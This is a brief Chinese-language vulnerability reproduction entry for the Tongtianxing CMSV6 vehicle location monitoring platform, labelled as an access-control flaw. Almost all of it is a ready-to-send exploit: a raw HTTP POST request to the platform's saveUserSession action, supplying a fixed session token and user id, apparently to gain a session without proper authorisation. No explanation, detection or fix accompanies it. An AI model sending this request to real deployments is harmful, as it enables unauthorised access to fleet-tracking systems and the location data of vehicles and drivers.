T1-10通天星-CMSV6车载定位监控平台-PermissionAC
漏洞复现:
payload:
POST /808gps/LocationManagement/UserSessionAction_saveUserSession.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:103.0)Gecko/20100101Firefox/103.0
Content-Type: application/x-www-form-urlencoded
userSession=42AA7A2BE767123A42E1530ACC920781&id=4